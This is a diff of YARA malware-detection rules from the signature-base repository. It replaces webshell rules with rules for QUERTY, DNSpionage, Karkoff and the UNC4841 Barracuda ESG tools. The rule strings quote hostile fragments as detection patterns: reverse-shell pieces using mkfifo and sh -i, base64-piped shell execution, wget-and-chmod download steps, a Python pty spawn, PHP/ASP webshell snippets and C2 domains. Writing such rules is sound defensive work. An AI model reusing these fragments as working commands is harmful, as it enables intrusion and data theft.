+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L193-L216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e246256696be90189e6d50a4ebc880e6d9e28dfd"
-		logic_hash = "198442e75422055e7d65c5d1aef55819036a99077aa79dbd5006ba97c4fe4af8"
-		score = 70
+		hash = "597082f05bfd3225587d480c30f54a7a1326a892"
+		logic_hash = "7d2617e0ee41ea475608757594cba8ae93f2dbb09b5d01d1fa3324b32ebb8aa0"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));" fullword ascii
-		$s2 = "if (!logIt && my_s_smtp && (dport == 25 || sport == 25))" fullword ascii
+		$s0 = "<configFileName>20120_cmdDef.xml</configFileName>" fullword ascii
+		$s1 = "<name>20120.dll</name>" fullword ascii
+		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<platform type=\"1\">" fullword ascii
+		$s5 = "</plugin>" fullword ascii
+		$s6 = "</pluginConfig>" fullword ascii
+		$s7 = "<pluginConfig>" fullword ascii
+		$s8 = "</platform>" fullword ascii
+		$s9 = "</lpConfig>" fullword ascii
+		$s10 = "<lpConfig>" fullword ascii
 
 	condition:
-		filesize < 91KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Udf_Udf : FILE
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20121_Cmddef
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file udf.php"
+		description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml"
 		author = "Florian Roth (Nextron Systems)"
-		id = "07252f2d-1a99-5f21-940d-899a4821b511"
-		date = "2015-06-23"
+		id = "2deb73f7-372e-5d29-a077-431ab1967d93"
+		date = "2015-01-18"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L196-L211"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L218-L251"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "df63372ccab190f2f1d852f709f6b97a8d9d22b9"
-		logic_hash = "c7db32b5e66601e0b8322ac67b6b9ba8d6222891ed01db557bfac9985140421a"
-		score = 70
-		quality = 85
-		tags = "FILE"
+		hash = "64ac06aa4e8d93ea6063eade7ce9687b1d035907"
+		logic_hash = "d73f0e964bd57ed3a2cd782ac204a2b82a9b334e33d64dc61e6414654d7c38d3"
+		score = 75
+		quality = 83
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<?php // Source  My : Meiam  " fullword ascii
-		$s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
+		$s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" fullword ascii
+		$s1 = "<message>Failed to get File Time</message>" fullword ascii
+		$s2 = "<description>Keystroke Logger Plugin.</description>" fullword ascii
+		$s3 = "<message>Failed to set File Time</message>" fullword ascii
+		$s4 = "</commands>" fullword ascii
+		$s5 = "<commands>" fullword ascii
+		$s6 = "</version>" fullword ascii
+		$s7 = "<associatedImplantId>20120</associatedImplantId>" fullword ascii
+		$s8 = "<message>No Comms. with Driver</message>" fullword ascii
+		$s9 = "</error>" fullword ascii
+		$s10 = "<message>Invalid File Size</message>" fullword ascii
+		$s11 = "<platforms>Windows (User/Win32)</platforms>" fullword ascii
+		$s12 = "<message>File Size Mismatch</message>" fullword ascii
+		$s13 = "<projectpath>plugin/Utility</projectpath>" fullword ascii
+		$s14 = "<pluginsDepend>None</pluginsDepend>" fullword ascii
+		$s15 = "<dllDepend>None</dllDepend>" fullword ascii
+		$s16 = "<pluginname>E_QwertyIM</pluginname>" fullword ascii
+		$s17 = "<rightsRequired>None</rightsRequired>" fullword ascii
+		$s18 = "<minorType>0</minorType>" fullword ascii
+		$s19 = "<code>00001002</code>" fullword ascii
+		$s20 = "<code>00001001</code>" fullword ascii
 
 	condition:
-		filesize < 430KB and all of them
+		12 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_JSP_Jsp : FILE
+rule SIGNATURE_BASE_MAL_DNSPIONAGE_Malware_Nov18 : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file jsp.html"
+		description = "Detects DNSpionage Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "46f2fb10-2c0c-5bc2-b3bb-eba4c74bcad7"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L213-L228"
+		id = "5a0b498b-b2e9-5827-9908-63586b2cf947"
+		date = "2018-11-30"
+		modified = "2023-01-06"
+		reference = "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dnspionage.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c58fed3d3d1e82e5591509b04ed09cb3675dc33a"
-		logic_hash = "089e1a553900d149a4087ac81254295d74de15d9baaf73e60ce4f061e450e8c7"
-		score = 70
+		logic_hash = "c7f148b790c391283ac833236ad7fd3af7af517098adeaf88b8ee8d95df11487"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec"
+		hash2 = "45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff"
 
 	strings:
-		$s1 = "<input name=f size=30 value=shell.jsp>" fullword ascii
-		$s2 = "<font color=red>www.i0day.com  By:" fullword ascii
+		$x1 = ".0ffice36o.com" ascii
+		$s1 = "/Client/Login?id=" ascii
+		$s2 = ".\\Configure.txt" ascii
+		$s5 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"txts\"" fullword ascii
 
 	condition:
-		filesize < 3KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_T00Ls_Lpk_Sethc_V4_Mail : FILE
+rule SIGNATURE_BASE_APT_Dnspionage_Karkoff_Malware_Apr19_1 : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file mail.php"
+		description = "Detects DNSpionage Karkoff malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2f7d8a4d-9d94-5f23-9768-cc3712678d93"
-		date = "2015-06-23"
+		id = "be955760-ae94-5f77-928d-f4118a97ae6a"
+		date = "2019-04-24"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L230-L245"
+		reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dnspionage.yar#L23-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0a9b7b438591ee78ee573028cbb805a9dbb9da96"
-		logic_hash = "b835a6d0c736116e0a8b277dadbf25c2ac333b0d7937a6f67ed59887c610a57a"
-		score = 70
+		logic_hash = "1e8157cec7e70f7c95dffecd1c5a820f29825586a95f2a5c6e4db0a51b1d4708"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11"
+		hash2 = "b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04"
+		hash3 = "5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c"
+		hash4 = "cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5"
 
 	strings:
-		$s1 = "if (!$this->smtp_putcmd(\"AUTH LOGIN\", base64_encode($this->user)))" fullword ascii
-		$s2 = "$this->smtp_debug(\"> \".$cmd.\"\\n\");" fullword ascii
+		$x1 = "Karkoff.exe" fullword wide
+		$x2 = "kuternull.com" fullword wide
+		$x3 = "rimrun.com" fullword wide
+		$s1 = "C:\\Windows\\Temp\\" wide
+		$s2 = "CMD.exe" fullword wide
+		$s3 = "get_ProcessExtensionDataNames" fullword ascii
+		$s4 = "get_ProcessDictionaryKeys" fullword ascii
 
 	condition:
-		filesize < 39KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Phpwebbackup : FILE
+rule SIGNATURE_BASE_APT_UNC4841_ESG_Barracuda_CVE_2023_2868_Forensic_Artifacts_Jun23_1 : SCRIPT CVE_2023_2868
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file phpwebbackup.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "eb737ea6-231c-5e8d-b976-75f1044f9f54"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L247-L262"
+		description = "Detects forensic artifacts found in the exploitation of CVE-2023-2868 in Barracuda ESG devices by UNC4841"
+		author = "Florian Roth"
+		id = "50518fa1-33de-5fe5-b957-904d976fb29a"
+		date = "2023-06-15"
+		modified = "2023-06-16"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L2-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c788cb280b7ad0429313837082fe84e9a49efab6"
-		logic_hash = "45452fc415fbafe170a1b1f5a58df40f0ec65a9a6678e675b40a8c54e2d8bd6c"
-		score = 70
+		logic_hash = "fa7cac1e0f6cb6fa3ac271c1fff0039ff182b6859920b4eca25541457654acde"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "SCRIPT, CVE-2023-2868"
 
 	strings:
-		$s0 = "<?php // Code By isosky www.nbst.org" fullword ascii
-		$s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
+		$x01 = "=;ee=ba;G=s;_ech_o $abcdefg_${ee}se64" ascii
+		$x02 = ";echo $abcdefg | base64 -d | sh" ascii
+		$x03 = "setsid sh -c \"mkfifo /tmp/p" ascii
+		$x04 = "sh -i </tmp/p 2>&1" ascii
+		$x05 = "if string.match(hdr:body(), \"^[%w%+/=" ascii
+		$x06 = "setsid sh -c \"/sbin/BarracudaMailService eth0\""
+		$x07 = "echo \"set the bvp ok\""
+		$x08 = "find ${path} -type f ! -name $excludeFileNameKeyword | while read line ;"
+		$x09 = " /mail/mstore | xargs -i cp {} /usr/share/.uc/"
+		$x10 = "tar -T /mail/mstore/tmplist -czvf "
+		$sa1 = "sh -c wget --no-check-certificate http"
+		$sa2 = ".tar;chmod +x "
 
 	condition:
-		uint16( 0 ) == 0x3f3c and filesize < 67KB and all of them
+		1 of ( $x* ) or all of ( $sa* )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Dz_Phpcms_Phpbb : FILE
+rule SIGNATURE_BASE_APT_MAL_UNC4841_SEASPY_Jun23_1 : CVE_2023_2868 FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file dz_phpcms_phpbb.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f7e5413f-a7c9-51d4-8422-30c3e2462be2"
-		date = "2015-06-23"
+		description = "Detects SEASPY malware used by UNC4841 in attacks against Barracuda ESG appliances exploiting CVE-2023-2868"
+		author = "Florian Roth"
+		id = "bcff58f8-87f6-5371-8b96-5d4c0f349000"
+		date = "2023-06-16"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L264-L281"
+		reference = "https://blog.talosintelligence.com/alchimist-offensive-framework/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L30-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "33f23c41df452f8ca2768545ac6e740f30c44d1f"
-		logic_hash = "1455df58f51c3ae7558b89c940d97ea5870f261217b2a09727bb6678bcbd5500"
-		score = 70
+		logic_hash = "c1dcb841fb872f0d5e661bfd90fca3075f5efc95b1f9dfff72fa318ed131e9d1"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-2868, FILE"
+		hash1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
 
 	strings:
-		$s1 = "if($pwd == md5(md5($password).$salt))" fullword ascii
-		$s2 = "function test_1($password)" fullword ascii
-		$s3 = ":\".$pwd.\"\\n---------------------------------\\n\";exit;" fullword ascii
-		$s4 = ":user=\".$user.\"\\n\";echo \"pwd=\".$pwd.\"\\n\";echo \"salt=\".$salt.\"\\n\";" fullword ascii
+		$sx1 = "usage: ./BarracudaMailService <Network-Interface>. e.g.: ./BarracudaMailService eth0" ascii fullword
+		$s1 = "fcntl.tmp.amd64." ascii
+		$s2 = "Child process id:%d" ascii fullword
+		$s3 = "[*]Success!" ascii fullword
+		$s4 = "NO port code" ascii
+		$s5 = "enter open tty shell" ascii
+		$op1 = { 48 89 c6 f3 a6 0f 84 f7 01 00 00 bf 6c 84 5f 00 b9 05 00 00 00 48 89 c6 f3 a6 0f 84 6a 01 00 00 }
+		$op2 = { f3 a6 0f 84 d2 00 00 00 48 89 de bf 51 5e 61 00 b9 05 00 00 00 f3 a6 74 21 48 89 de }
+		$op3 = { 72 de 45 89 f4 e9 b8 f4 ff ff 48 8b 73 08 45 85 e4 ba 49 3d 62 00 b8 44 81 62 00 48 0f 45 d0 }
 
 	condition:
-		filesize < 22KB and all of them
+		uint16( 0 ) == 0x457f and filesize < 9000KB and 3 of them or 5 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Picloaked_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_UNC4841_SEASPY_LUA_Jun23_1 : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file 1.gif"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2ff44c4a-ed97-5635-9926-8d54a8364fab"
-		date = "2015-06-23"
+		description = "Detects SEASPY malware related LUA script"
+		author = "Florian Roth"
+		id = "a44861d0-107e-589b-8cf1-3fbc2f5c78dc"
+		date = "2023-06-16"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L283-L299"
+		reference = "https://blog.talosintelligence.com/alchimist-offensive-framework/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L57-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3eab1798cbc9ab3b2c67d3da7b418d07e775db70"
-		logic_hash = "a816ac9e98b7c5208f075ffcb9a6525016d6a5c468005d78ecab90d651423705"
-		score = 70
+		logic_hash = "f78823a4ba9e025ba4833a2d5234c7baba33c1167c0247f13b8b2baa430aa4e5"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "56e8066bf83ff6fe0cec92aede90f6722260e0a3f169fc163ed88589bffd7451"
 
 	strings:
-		$s0 = "<?php eval($_POST[" ascii
-		$s1 = ";<%execute(request(" ascii
-		$s3 = "GIF89a" fullword ascii
+		$x1 = "os.execute('rverify'..' /tmp/'..attachment:filename())" ascii fullword
+		$x2 = "log.debug(\"--- opening archive [%s], mimetype [%s]\", tmpfile" ascii fullword
+		$xe1 = "os.execute('rverify'..' /tmp/'..attachment:filename())" ascii base64
+		$xe2 = "log.debug(\"--- opening archive [%s], mimetype [%s]\", tmpfile" ascii base64
 
 	condition:
-		filesize < 6KB and 2 of them
+		filesize < 500KB and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Assembly : FILE
+rule SIGNATURE_BASE_APT_HKTL_Proxy_Tool_Jun23_1 : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file assembly.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7639e81d-fe21-5a12-9a20-fe894eefef73"
-		date = "2015-06-23"
+		description = "Detects agent used as proxy tool in UNC4841 intrusions - possibly Alchemist C2 framework implant"
+		author = "Florian Roth"
+		id = "0e406737-3083-53c2-a6d2-14c07794125a"
+		date = "2023-06-16"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L301-L315"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L76-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2bcb4d22758b20df6b9135d3fb3c8f35a9d9028e"
-		logic_hash = "34dc47b2f91a15a62175f3cab88d5ff24d2a3aa62f74fb9e43a4aaae96ced999"
-		score = 70
+		logic_hash = "7e2152e1aa74e1842519e2eecd2acd3ef8eb8d517f3c0ef9f05c983616f223c3"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ca72fa64ed0a9c22d341a557c6e7c1b6a7264b0c4de0b6f717dd44bddf550bca"
+		hash2 = "57e4b180fd559f15b59c43fb3335bd59435d4d76c4676e51a06c6b257ce67fb2"
 
 	strings:
-		$s0 = "response.write oScriptlhn.exec(\"cmd.exe /c\" & request(\"c\")).stdout.readall" fullword ascii
+		$a2 = "/src/runtime/panic.go"
+		$s1 = "main.handleClientRequest" ascii fullword
+		$s2 = "main.sockIP.toAddr" ascii fullword
 
 	condition:
-		filesize < 1KB and all of them
+		( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x7f454c46 or uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca or uint32( 0 ) == 0xbebafeca ) and filesize < 10MB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php8 : FILE
+rule SIGNATURE_BASE_SUSP_Fscan_Port_Scanner_Output_Jun23 : SCRIPT FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php8.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8b25b7f3-b94e-5887-b102-b52d340a4316"
-		date = "2015-06-23"
+		description = "Detects output generated by the command line port scanner FScan"
+		author = "Florian Roth"
+		id = "7eb4b27f-0c5b-5d7e-b759-95d7894d5822"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L317-L334"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L103-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b7b49f1d6645865691eccd025e140c521ff01cce"
-		logic_hash = "435ceb72c082f702284c464979a907a59a42bb4aa07311f9b2da1a9831efac11"
+		logic_hash = "49b5055c96d7b7446ee5ae8667a5aa3645f0f98d8b5f2bffcd6ef3b20bc64e05"
 		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "SCRIPT, FILE"
 
 	strings:
-		$s0 = "<a href=\"http://hi.baidu.com/ca3tie1/home\" target=\"_blank\">Ca3tie1's Blog</a" ascii
-		$s1 = "function startfile($path = 'dodo.zip')" fullword ascii
-		$s3 = "<form name=\"myform\" method=\"post\" action=\"\">" fullword ascii
-		$s5 = "$_REQUEST[zipname] = \"dodozip.zip\"; " fullword ascii
+		$s1 = "[*] NetInfo:" ascii
+		$s2 = ":443 open" ascii
+		$s3 = "   [->]"
 
 	condition:
-		filesize < 25KB and 2 of them
+		filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Xx : FILE
+rule SIGNATURE_BASE_SUSP_PY_Shell_Spawn_Jun23_1 : SCRIPT
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file xx.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "72a04950-b82d-516f-a376-5253b7de1158"
-		date = "2015-06-23"
+		description = "Detects suspicious one-liner to spawn a shell using Python"
+		author = "Florian Roth"
+		id = "15fd2c9a-c425-5d4d-9209-fd3826074d6c"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L336-L352"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L119-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2f39f1d9846ae72fc673f9166536dc21d8f396aa"
-		logic_hash = "67c542f172fd1b97fbee4697fd42bab9486e3d779ce62993617e5a5205bd75d4"
+		logic_hash = "63e94447930d5a00399de753076facbfb2bf18dd8c815f01aaefd14678aea034"
 		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "SCRIPT"
 
 	strings:
-		$s0 = "$mysql.=\"insert into `$table`($keys) values($vals);\\r\\n\";" fullword ascii
-		$s2 = "$mysql_link=@mysql_connect($mysql_servername , $mysql_username , $mysql_password" ascii
-		$s16 = "mysql_query(\"SET NAMES gbk\");" fullword ascii
+		$x1 = "python -c import pty;pty.spawn(\"/bin/" ascii
 
 	condition:
-		filesize < 2KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_JSPMSSQL : FILE
+rule SIGNATURE_BASE_APT_MAL_Hunting_LUA_SEASIDE_1 : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file JSPMSSQL.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "061c1e53-edd0-5838-8d0f-6fb8f4fa078a"
-		date = "2015-06-23"
+		description = "Hunting rule looking for strings observed in SEASIDE samples."
+		author = "Mandiant"
+		id = "86eaff7b-4ca0-53cd-8886-da66a36c778f"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L354-L369"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L136-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c6b4faecd743d151fe0a4634e37c9a5f6533655f"
-		logic_hash = "c08e69345cb09e41840a81dcd8a015f9e1be93d570b64c310be74631e5314e2f"
+		hash = "cd2813f0260d63ad5adf0446253c2172"
+		logic_hash = "82b61325a78bf8ab09d426cfadceb614a256dfcafb2e1f75595de63593ed2574"
 		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<form action=\"?action=operator&cmd=execute\"" fullword ascii
-		$s2 = "String sql = request.getParameter(\"sqlcmd\");" fullword ascii
+		$s1 = "function on_helo()"
+		$s2 = "local bindex,eindex = string.find(helo,'.onion')"
+		$s3 = "helosend = 'pd'..' '..helosend"
+		$s4 = "os.execute(helosend)"
 
 	condition:
-		filesize < 35KB and all of them
+		filesize < 1MB and all of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Injection_Transit_Jmpost : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Hunting_Linux_WHIRLPOOL_1 : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file jmPost.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "892f747e-6065-5baf-b928-8d69d8792483"
-		date = "2015-06-23"
+		description = "Hunting rule looking for strings observed in WHIRLPOOL samples."
+		author = "Mandiant"
+		id = "a997bd65-c502-53a0-8bb8-62daaa916f0d"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L371-L386"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L154-L173"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f80ec26bbdc803786925e8e0450ad7146b2478ff"
-		logic_hash = "6c7f52cf7ff6df9867ea2c46cd8f40ef0e077d4e1d9033cde0649a209bffe21b"
+		hash = "177add288b289d43236d2dba33e65956"
+		logic_hash = "d03c0e292b9b97bbf76585fc74208e4263d753807b8e4a445be80d41264d5432"
 		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "response.write  PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii
-		$s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii
+		$s1 = "error -1 exit" fullword
+		$s2 = "create socket error: %s(error: %d)\n" fullword
+		$s3 = "connect error: %s(error: %d)\n" fullword
+		$s4 = {C7 00 20 32 3E 26 66 C7 40 04 31 00}
+		$c1 = "plain_connect" fullword
+		$c2 = "ssl_connect" fullword
+		$c3 = "SSLShell.c" fullword
 
 	condition:
-		filesize < 9KB and all of them
+		uint32( 0 ) == 0x464c457f and filesize < 15MB and ( all of ( $s* ) or all of ( $c* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Web_Asp : FILE
+rule SIGNATURE_BASE_APT_MAL_LUA_Hunting_SKIPJACK_1
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file web.asp.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "67e03591-770a-5b32-9579-c899894740fc"
-		date = "2015-06-23"
+		description = "Hunting rule looking for strings observed in SKIPJACK installation script."
+		author = "Mandiant"
+		id = "0026375c-7f37-5ef9-bd55-5b9fc499e5d2"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
